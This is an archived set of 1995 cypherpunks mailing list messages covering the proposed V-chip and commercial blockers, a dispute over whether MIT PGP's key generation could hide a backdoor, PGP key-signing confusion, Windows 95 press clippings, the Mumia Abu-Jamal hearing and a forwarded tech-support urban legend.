tNxTD5+dUpYyiab4j9CKE9FTBsuY+TriyafFOMRBvjELYVgh0zhnS6GBb2ZVN3R5
J1B+qItB/kK2rvrPN+9tqXaH6/lleOquZxA4quoVGOKOmdOg/uWA9xme90NqjjzS
ZbTKVSWEuqWvbaIvm3KexgH1/t9jIU7EcRbfoRWiFDQrW/ecvInW61J6kEGfVqPK
RmjsoyDsYZJ11AqPaZLgVDLY8lmAN9qzaiUH785tVRQY/A5qQzLrkA==
=sDbg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Mon, 31 Jul 95 13:50:00 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: your mail
In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu>
Message-ID: <Pine.HPP.3.91.950731135115.2084A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



This might be a minor thing, but could people posting to the mailing list
please make sure that the Subject line doesn't say "re: your mail".
  it really slows me down to have to check manually what the actual
subject was or if it was directed to ME but put my addres in the cc 
instead of the To.


Thankyou.

Syed Yusuf
http://www.uidaho.edu/~yusuf921





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 11:13:27 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <v02120d02ac42cc114f88@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I could agree to a private filtering mechanism where each program
broadcasts an ID number.

A chip on the set reads this info from the dark band between frames or
someplace.

Private agencies rate the programs by whatever criteria sells ("Bikinis &
Beer", "Motherhood and Apple Pie", whatever), and people load those
rating/show lookups into their set off of the net or wherever...

Certainly the government shouldn't reqire anything. The government couldn't
find its ass with both hands. I bet this scheme could sell on an
information value-added basis alone.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 11:17:51 PDT
To: cypherpunks@toad.com
Subject: Customer Service?
Message-ID: <v02120d03ac42ce45d415@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Veracity suspect, but an interesting crypto story nonetheless...

>Subject: Tech support story (fwd)
>
>---------- Forwarded message ----------
> [Urban legend of the day...]
>
> Subject: Stressful tech call
> To: Customer Service; TechSports
>
> This falls into the "Why did it have to happen on *MY* shift?" category.
>
> A friend of mine is a chief engineer at SuperMac, and he related this
> story to me.
>
> SuperMac records a certain number of technical support calls at random,
> to keep tabs on customer satisfaction.  By wild "luck", they managed to
> catch the following conversation on tape.
>
> Some poor SuperMac TechSport got a call from some middle level official
> from the legitimate government of Trinidad.  The fellow spoke very good
> English, and fairly calmly described the problem.
>
> It seemed there was a coup attempt in progress at that moment.  However,
> the national armoury for that city was kept in the same building as the
> Legislature, and it seems that there was a combination lock on the door
> to the armoury.  Of the people in the capitol city that day, only the
> Chief of the Capitol Guard and the Chief Armourer knew the combination to
> the lock, and they had already been killed.
>
> So, this officer of the government of Trinidad continued, the problem is
> this.  The combination to the lock is stored in a file on the Macintosh,
> but the file has been encrypted with the SuperMac product called Sentinel.
> Was there any chance, he asked, that there was a "back door" to the
> application, so they could get the combination, open the armoury door,
> and defend the Capitol Building and the legitimately elected government
> of Trinidad against the insurgents?
>
> All the while he is asking this in a very calm voice, there is the sound
> of gunfire in the background. The Technical Support guy put the person on
> hold. A phone call to the phone company verified that the origin of the
> call was in fact Trinidad.  Meanwhile, there was this mad scramble to see
> if anybody knew of any "back doors" in the Sentinel program.
>
> As it turned out, Sentinel uses DES to encrypt the files, and there was
> no known back door.  The Tech Support fellow told the customer that aside
> from trying to guess the password, there was no way through Sentinel, and
> that they'd be better off trying to physically destroy the lock.
>
> The official was very polite, thanked him for the effort, and hung up.
> That night, the legitimate government of Trinidad fell.  One of the BBC
> reporters mentioned that the casualties seemed heaviest in the capitol,
> where for some reason, there seemed to be little return fire from the
> government forces.
>
> O.K., so they shouldn't have kept the combination in so precarious a
> fashion. But it does place, "I can't see my Microsoft Mail server"
> complaints in a different sort of perspective, does it not?
>

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 31 Jul 95 12:10:31 PDT
To: cypherpunks@toad.com
Subject: LOG_rol
Message-ID: <199507311910.PAA20121@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-31-95.  NYPaper shredder Windows 95 confetti:


   "Windows of Opportunity for Microsoft."

      Windows 95 is already creating a stir in markets
      worldwide, in Washington and on Wall Street. The
      marketing squad is armed with a $150 million budget to
      help their new product become the most successful in
      computer software history.                     NYT_myr


   "The Customers: Computer Users Told To Go Slow in Change Of
   Operating Systems."

      "There aren't too many reasons to change right now." For
      Mr. Mott's clients, some of whom have hundreds of PC's,
      changing to the new operating system would be disruptive
      and expensive and fraught with the minor technical
      glitches common in the first iteration of any
      software.                                      WOA_nag


   "The Rival: Bracing for a Microsoft Onslaught, Apple Sees
   No reason to Panic."

      A growing chorus of pundits and Wall Street analysts has
      zeroed in on Apple as the biggest potential loser in the
      wake of the introduction of Windows 95. There is another
      view within the industry, however, that holds that the
      computer maker is not in danger.               APE_duk


   "On The Net: The real significance of Windows 95 is
   reaching the Web with a single click of the mouse."

      The real significance of Windows 95 is as a distribution
      vehicle for a simple icon, or symbol, on the computer
      screen. With the icon, the user connects to the MSN, and
      from there to the Internet. And that is where the real
      money lies.                                    RER_edg


   "Haven't heard of Windows 95? Where have you been hiding?"

      To introduce Windows 95, the Microsoft Corporation is
      amassing almost every weapon in the advertising arsenal,
      like teaser ads to entice consumers into anticipating
      the computer operating system as much as a Super Bowl or
      a birthday party.                              SOP_sud


   5 ez: LOG_rol











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 12:26:05 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: your mail
In-Reply-To: <9507311434.AA25514@all.net>
Message-ID: <199507311925.PAA28281@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hey, Doc...

> The term paranoid is inappropriate in this context.  Paranoia refers to
> an irrational fear, while I am expressing a rational concern over a
> system that has been taken over by a (partially) government funded
> university and which has not been properly verified.  The history of
> cryptography (as they say) is (quite literally) littered with the dead
> bodies of people killed because somebody else thought a cryptosystem was
> good enough when it was not. 

If you are concerned that someone put a whole or backdoor in PGP, then
go grab the source and take a look for yourself.  Thats why the code
is available.  If you can't understand it, then you probably have no
real right to complain!  However if you are still paranoid (and yes, I
do believe this is an irrational fear, being the person who maintains
the MIT PGP development sources) then go find someone who can
understand it and ask them.

As a side note, PGP does not go out of its way to choose "good" primes
over other primes.  Take a look at genprime.c and read the comment
near the top of the file.  It explains why.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 31 Jul 95 07:46:27 PDT
To: cypherpunks@toad.com
Subject: Sex & Crime TV filter
Message-ID: <9507311424.AA01110@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday I heard in the radio that someone in America has developed
some device which darkens the TV screen if there is sex or crime on TV. 

Does anyone know whether this is true and how it works?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Mon, 31 Jul 95 16:39:18 PDT
To: cypherpunks@toad.com
Subject: Public Key Confusion
Message-ID: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I am a very confused over my PGP public key(s).  I have signed my
public key and this is shown in a verbose listing of my public
keyring.  The same date appears in my public keyring for my public key
as in my secret keyring for my secret key.  The .asc file for my
public key has the same file date (per a file-manager program).

SOURCE OF CONFUSION: when I extract my public key from my public
keyring and insert the extracted public key into a message, the public
key that is inserted is bigger than and different from the public key
in the .asc file.  

Am I correct to assume that the .asc version is a good public key but
*unsigned*, and that the larger public key extracted from my public
keyring is the same public key but has the additional component of my
signature built into the body of, or seemlessly incorporated into, or
otherwise coupled with, my public key?

People to whom I have sent the smaller .asc version of my public key
have sent me messages encrypted with that key, and I have been able to
decrypt them with no apparent problem.  My confusion arose when
someone suggested that I sign my own public key, I clearsigned it (I
know, duh!), and PGP and a public key server could not find a key
block in the clearsigned message because the clearsigning put "- " at
the start of both PGP block delimiters.

Should I just stop distributing the .asc version and only let people
have the longer version extracted from my public keyring?  Is that the
properly signed copy?

Tampering can be ruled out as a practical matter.

-- Best Regards, Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 17:02:37 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199508010000.RAA28911@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Yesterday I heard in the radio that someone in America has developed
>some device which darkens the TV screen if there is sex or crime on TV. 

It's the "V-Chip" for blocking television programs marked as "Violent" 
by the broadcasters, which some politicians are proposing to require that
all TV makers install in new TVs and all broadcasters label all programs.
The descriptions in the press have made it sound like there's one bit of
control info,
which would be very stupid; multiple bits would at least allow parents to
block programs separately for
violence/sex/nudity/nasty-words/political-correctness.
That would also be offensive, and more likely to be used.

Unlike VCR-plus, which is a complex hash of the time and channel for a given
program
(complexity included so you have to buy TV Guide magazine), any V-chip codes
could be handled automatically.  (Also, V-chip is designed to turn the TV off,
while VCR-plus is designed to turn the recorder on.  If the designers were
clever,
the V-chip mechanism can probably also block video-tapes with V-chip codes?)

If somebody wanted to develop a free-market rating service, the most convenient
mechanism would probably be to broadcast VCR-plus codes with detailed
information
about programs to a set-top box, so you could sell features like
        - block speeches by annoying politicians
        - record all football matches but not other sports events
        - record the closed captioning from infomercials and parse for
                telephone numbers so you can order things automatically!
        - turn on the Nintendo whenever Barney the Dinosaur is on.

Blocking commercials would be fun, but would probably be illegal :-),
or at least stations that supported it would have trouble getting advertisers.
(It would almost certainly be illegal to block the "Enhanced Underwriting"
on public broadcasting, since otherwise you wouldn't get to hear
"The Environmental Correctness Show has been brought to you by a grant
from BigOil corporation, lubricating the Alaskan shoreline for 15 years!".)

        
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Quazi F. Haque" <qfh1@crux3.cit.cornell.edu>
Date: Mon, 31 Jul 95 14:40:33 PDT
To: John Young <jya@pipeline.com>
Subject: Re: LOG_rol
In-Reply-To: <199507311910.PAA20121@pipe1.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.950731173942.11320A-100000@crux3.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain




  Quazi F Haque  | Those that can give up essential liberty to obtain a little
qfh1@cornell.edu | temporary safety deserve neither liberty nor safety. - BF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Mon, 31 Jul 95 17:50:20 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
In-Reply-To: <199508010000.RAA28911@ix3.ix.netcom.com>
Message-ID: <199508010050.RAA19664@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart writes:
 > Blocking commercials would be fun, but would probably be illegal :-),
 > or at least stations that supported it would have trouble getting
 > advertisers.

     Actually, there was a story in the San Jose Mercury News a couple
of weeks ago regarding a product that does just that.  VCRs from at
least two manufacturers will contain a chip and/or firmware that
detects commercials and does not record them.

     My dim memories from a project I did for Sony a couple of years
ago are that commercials are separated by a fixed number of black
frames and some, at least, have tracking information encoded so that
advertisers can monitor how often they are played.  I'll try to dig up
more info.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB16QO5Yg08fDKehAQHcgAP/c9OCy/jIKXdjDPjfifPHfK9tqRO8EWNY
cAoPH418Otur0jaORTEoyuMwcuZcApm4yzsF+5teLi2p+y/BhAPNH9dSMLNGnVuQ
GUkvKJIHapYyR8dlY+d2AsJWOi3jBCTTt1Spog+3uGcx5ry8ROK91Xr3XUNntcyG
w2bG06dL44c=
=KY6i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 31 Jul 95 15:14:20 PDT
To: cypherpunks@toad.com
Subject: Rosenberging Mumia
Message-ID: <199507312213.SAA23343@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jlasser@rwd.goucher.edu (Jon Lasser) on 
Mon, 31 Jul 12:43 PM

>On Mon, 31 Jul 1995, Timothy C. May wrote:
>
>> The Rosenbergs were certainly the Mumia Abu Jamals of 
>their day.
>
>The Mumia case (something friends of mine are more than 
>peripherally acquainted with) seems to be very much in 
>doubt.  Of course, they'll kill him anyway, probably.  
>But I suggest reading E.L. Doctrow's essay on the 
>subject from the NYT of several weeks (months? 
>possibly) back.

------------

In addition to Doctorow's OpEd piece, there have been three 
recent NYPaper articles on the case and a half-page ad.


Here's a judicious benchwarmer from the July 30 article:


   Judge Albert F. Sabo of Common Pleas Court, who conducted
   Mr. Abu-Jamal's first contentious trial, is presiding over
   his hearing for a new trial, and defense lawyers contend
   that not much has changed.

   Judge Sabo, a retired member of the Fraternal Order of
   Police, has sent more people to death row than any judge in
   the state. In the current hearing he has been openly
   contemptuous of the defense.

   "Objection is over-ruled, whatever it was," the judge told
   Mr. Abu-Jamal's lead lawyer, Leonard I. Weinglass, a
   veteran of some of the most politically charged trials of
   recent decades, including that of the Chicago Eight after
   the 1968 Democratic Convention.

   Judge Sabo has sustained virtually every prosecution
   objection while shooting down almost every defense
   objection. At one point, when Mr. Weinglass asked for a
   four-minute recess to locate a crucial witness, Judge Sabo,
   looking at his watch, said, "It's ten-twenty-eight-and-a-
   half. You have until 10:30."

   On Wednesday, the first day of the hearing, Judge Sabo
   turned his back and walked out of the courtroom as another
   defense lawyer, Rachel H. Wolkenstein, was addressing him
   about a legal issue. He came back a few minutes later,
   saying that he could not hear because of the noise coming
   from the street, where a large group of Mr. Abu-Jamal's
   supporters were chanting, "Free Mumia now."

   Richard B. Costello, the president of the Philadelphia
   Fraternal Order of Police, said he did not understand why
   Mr. Abu-Jamal's plight had drawn so much attention and big-
   league legal help.

   "He has more lawyers than Snow White had dwarfs," Mr.
   Costello said. "There's nothing special about this guy.
   He's a cop killer. We've had cop killers before, and,
   unfortunately, we'll have them again."

   Although Judge Sabo has frequently urged the defense to
   hurry, he interrupted the proceedings for several minutes
   to argue and reminisce with a baffled witness about the
   location of a swimming pool in his old neighborhood
   sometime around "1926 or '28."

   As he talked about the pool, a woman in the audience jumped
   to her feet and shouted, "Aren't we here to talk about a
   man's life?" She was escorted from the courtroom. Minutes
   later, the judge asked another question about the pool.
   Several of Mr. Abu-Jamal's supporters were removed for
   refusing to stand when Judge Sabo entered and another was
   taken outside for giving the judge a Nazi-style salute.


----------


To eye the outcry, send a blank msg with subject: MUM_fry.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 18:45:56 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial killers
Message-ID: <ac42d528030210042967@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:00 AM 8/1/95, Robert Hettinga wrote:
>God help me, all of this reminds me of a Carl Sagan book, of all things.
>One of his science fiction characters was said to have made his first
>fortune by building a commercial zapping chip for VCRs.
>
>Butthead Astronomer, indeed...

There have been _billions and billions_ of proposals for commercial
zappers. (Actually, not such a saganesque number, but dozens at least.)

Harry Bartholomew was telling me a year or so ago about some ideas for
detecting volume changes. I think, however, the problem of distinguishing
commercial from non-commercial signal is, I think, a tough one.

My point earlier was not to actually do this, but to suggest that if the
V-chip is to code various kinds of content, then the logic is strong for
commercial content to be similarly coded. (For example, schools often show
taped broadcasts...they might claim that it would be harmful and improper
for children to be exposed to beer commercial during school hours...)

This would gore the ox of the advertisers, so they might quietly have the
whole V-chip thing killed.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 15:59:19 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: a hole in PGP
In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu>
Message-ID: <9507312253.AA27941@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> Hey, Doc...
> 
> > The term paranoid is inappropriate in this context.  Paranoia refers to
> > an irrational fear, while I am expressing a rational concern over a
> > system that has been taken over by a (partially) government funded
> > university and which has not been properly verified.  The history of
> > cryptography (as they say) is (quite literally) littered with the dead
> > bodies of people killed because somebody else thought a cryptosystem was
> > good enough when it was not. 
> 
> If you are concerned that someone put a whole or backdoor in PGP, then
> go grab the source and take a look for yourself.  Thats why the code
> is available.  If you can't understand it, then you probably have no
> real right to complain!  However if you are still paranoid (and yes, I
> do believe this is an irrational fear, being the person who maintains
> the MIT PGP development sources) then go find someone who can
> understand it and ask them.
> 
> As a side note, PGP does not go out of its way to choose "good" primes
> over other primes.  Take a look at genprime.c and read the comment
> near the top of the file.  It explains why.

My assertion regarding weakness of the key generation algorithm was not
related to the response you gave.  As a result, it appears that you are
avoiding the issue.  This looks bad if you are, as you claim, maintaining
a legitimate algorithm.  Perhaps you would be better served by addressing
the specifics of my comments - to wit: What makes you think PGPs method
of getting seeds does not lead to a limited key space that is within the
realm of modern computers to search?

	Your assertion that I could find the backdoor by inspecting the
program is the wrong tactic for secure programs.  If you want people to
believe that a program is secure, you had better come up with good
reasons that it is secure, and not hide behind "if you can't find any
holes, it must be secure".

	Clever back doors are not accomplished by an obvious program
change, but rather by the subtle use of some technique that appears to
do one thing when it actually does something else.  As a good example, a
subtle interation with the rest of the environment could modify the key
generation algorithm after it is loaded.  Unfortunately, PGP is too
large to verify against such back doors, so I ask again:

	Why (specifically) do you think the MIT version of PGP has no
backdoors and is not subject to attacks such as the one outlined in my
previous posting?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 16:23:22 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d01ac431417e9c5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM 7/31/95, Dr. Fred said:
>        Why (specifically) do you think the MIT version of PGP has no
>backdoors and is not subject to attacks such as the one outlined in my
>previous posting?

<Metzger_mode("on")>

I've been watching this gark long enough, I think.

Look. If you're qualified, look at the PGP source and vet it yourself. If
you aren't qualified, figure the market to be efficient in this instance
and assume the stuff works.

Stop wasting our time and bandwidth harassing the MIT folk about whether or
not their code is clean. Such posturing won't wash around here.

<Metzger_mode("off")>

Seriously, it may be an appeal to authority, but it can safely be assumed
that PGP is clean, and that MIT is *not* involved with the NSA and the Red
Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
postings.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 19:26:06 PDT
To: cypherpunks@toad.com
Subject: Attacks on PGP
Message-ID: <ac42d74b05021004a9dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Things are heating up between Fred Cohen and some of the rest of the list.

I don't believe MIT is in collusion with the NSA or any other government
agency to deliberately weaken or cripple PGP. I base this on having dealt
with some of the MIT folks, with the various source code analyses folks
have done, etc.

However, I think it's a perfectly *fine* idea for some group to launch a
cryptanalytic attack on PGP, or an attack based on any other approaches.
This is the "tiger team," or "Team B" approach to finding flaws and
weaknesses.

I don't take the security of PGP only on faith, though analyzing it is not
my bag, as they say. Rather, I use the Popper/Bartley notions of
falsifiabilty and see truth as a process, not a state. Seeing lots of
source code available, independent compilations on various machines, and
believing neither Zimmermann nor Atkins nor Schiller, etc., would consent
to inserting back doors into PGP, I am thus led to _believe_ that PGP is
probably not so affected. Doesn't mean it isn't so, but I'm not overly
worried about it.

Still, more studies and technical attacks (technical, not verbal) would be
welcome.

One of the problems we in the "civilian cryptography" sector face is that
we don't have much activity in cryptanalysis. (We've talked about this
several times before, before Fred Cohen joined the list, for example.) The
NSA and other intelligence agencies have not only code makers, they also
have code _breakers_ (such as modern ciphers are breakable, which hasn't
been the case much lately, if Bamford and Kahn are to be believed).
Probably entire groups whose only job is to try to break the systems
devised by others. (Modern ciphers are not as prone to breakage as earlier
ciphers were, for technical reasons, so I suspect the number of
cryptanalysts has shrunk since the good old days when they had more
successes...there may only be a small contingent left...)

The lack of cryptanalysis papers at "Crypto" has been striking...I was told
that the program committee considers cryptanalysis to be less important
than original research. (I can see the rationale in this, as Crypto is an
academic/research conference, and there are really no "engineering" crypto
conferences. And cryptanalysis might not even fit into an engineering
conference very well, as cryptanalysis is traditionally a sort of
"hobbyist" activity--if you've read Kahn you'll know what I mean.)

Crypto comes in various flavors, from hardware implementations, to number
theory, to Unix/IETF sorts of standards, to digital cash, and even to
statistical analysis. It is dangerous to have a "monoculture" in which one
topic is the trendy one and everyone is urged to work on that (whether the
"that" is PGP or Java or anything else equally trendy).

Most of the activity has been on adding hooks to PGP to make it usable in
other programs, or on remailers. Not as much effort has gone into proofs of
validity, systems analysis, etc. (Eric Hughes and I talked about this
several years ago, before the Cypherpunks group was formed...the need for
"Viper"-like systems with provably correct components, especially for
digital money, etc.)

If folks think PGP is flawed, or deserves an independent and critical look,
then this is a good project for someone. (I think several such analyses
have been made, however...this doesn't make it impossible for a flaw or
backdoor to exist, but at least the code has been examined by various
folks. I'm personally not too worried, though this has little suasive
value.)

(The Monoculture of Trendy Projects. My own programming mini-project, while
proceeding slowly, is of a pattern extractor and "entropy estimator" for
text. Stuff like measuring patterns, examining clusterings and
author-specific patterns. I'm writing it as a bunch of "critic agents" who
are responsible for different areas of analysis. In SmalltalkAgents. My
point? There will be those who cite the "monoculture" and scoff at anything
not written in C++ for Unix boxes, or not built to be Net-aware from the
gitgo, or not written as applets in Java....oh well, in Digital Walden, one
marches to a different drummer. Better to program the thing I _want_ to
program rather than the things I _don't_ want to program, and hence
_won't_. Final note: it'll be ready for use and maybe demonstration when
it's ready. And ready when it's finished, finished when it's ready.)

I've long appreciated Fred Cohen's work on viruses, so it's nice to have
him on the Cypherpunks list. Maybe Fred can tell us if it's really true
that he was stopped by U.S. Customs and held for many hours at the Canadian
border when going to or returning from a conference where he described
computer viruses....

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 31 Jul 95 16:42:02 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312339.TAA10743@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac425d4208021004ef6c@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>However, to help derail this V-chip being mandated, what if we (I mean
>activists, writers of columns, etc.) "insisted" that _commercials_ be
>similarly labelled?

I love it.  Great idea, Tim!

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMB1pgCoZzwIn1bdtAQFwRgF/YBsyqIwF34uxmZgxwzSfTeVcxOtnYe+J
ISSPgnB97QQqPUjYF0oO7T70wLXVwL21
=MEBo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 16:40:47 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9507312253.AA27941@all.net>
Message-ID: <199507312340.TAA02533@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Your assertion that I could find the backdoor by inspecting the
> program is the wrong tactic for secure programs.  If you want people to
> believe that a program is secure, you had better come up with good
> reasons that it is secure, and not hide behind "if you can't find any
> holes, it must be secure".

This is where you are very wrong.  I am not saying that "if you can't
find any holes it must be secure".  What I am saying is that the
source is available, and thousands of people have looked at the
source, and none of them have found any holes in it.

>  - to wit: What makes you think PGPs method
> of getting seeds does not lead to a limited key space that is within the
> realm of modern computers to search?

How do you propose that a user's keystrokes can be analyzed?  If you
assume that the PC's internal clock speed >> typing speed (which is a
good assumption -- how many keystrokes/second can you type?) then you
have a large amount of randomness that can be gained from timing
keystrokes.  Even a good typist will not have an even typestroke!
Have you read RFC 1750?  If not, I would recommend you read it before
you consider continuing this thread!

> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?

I think it has no backdoors because Jeff Schiller and I (among others)
have looked closely at the random number generator code (he has taken
a much closer look than I) and believe it to be secure.  I also know
that I did not put any backdoors into the code (but why would you
believe me, I must be paid by the government to say this, right?)

As to why I believe it is not subject to attack, I ask you again to go
read RFC 1750.  PGP follows its recommendations fairly closely.  There
is only one place where PGP fails to follow, and that is that PGP does
expose the bucket of random bits, rather than mixing them before
exporting them.  However I do not believe that this would affect the
generation of PGP Public Keys.

-derek

PS: In what field is your Doctorate?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 31 Jul 95 16:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312341.TAA10813@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507311827.NAA25455@snoopy.vetmed.auburn.edu>,
fstuart@vetmed.auburn.edu (Frank Stuart) wrote:

>I hadn't thought of that before.  I wonder how many kids will get
>zapped trying to bypass the chip on the inside.

Not half as many as will be arrested and convicted for "illegal
consumption of adult TV while underage" once bypassing such chip will
ineviably made a crime.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMB1qGyoZzwIn1bdtAQFiSQF/WUIZE345ZeNS7sy90zMUaZ9OoagnJSmn
VV2ZwXq20Ch+kbUmDTjf70twbKnu/i29
=s8TG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cwalton@earthlink.net (Conrad Walton)
Date: Mon, 31 Jul 95 19:47:06 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v01520c00ac43451fe01a@[204.80.138.58]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:11 AM 7/31/95, Sandy Sandfort wrote:
>
>I hope the movie is very popular.  It helps us by inducing
>healthy cynicism with a dash of paranoia.

I've been talking with a friend for years about PGP and crypto stuff. He
wasn't interested. Yesterday, he saw The Net. Now he can't wait to learn
how to use it.

This is a good thing. I hope it's a popular movie too.

Conrad Walton | cwalton@earthlink.net | http://XXX.XXXXXXXXX.XXX/~XXXXXXX/
------------------------------------------------------------------------------
Without JOY, there is no STRENGTH.
Without STRENGTH, all other virtues are worthless.     Edward Abbey







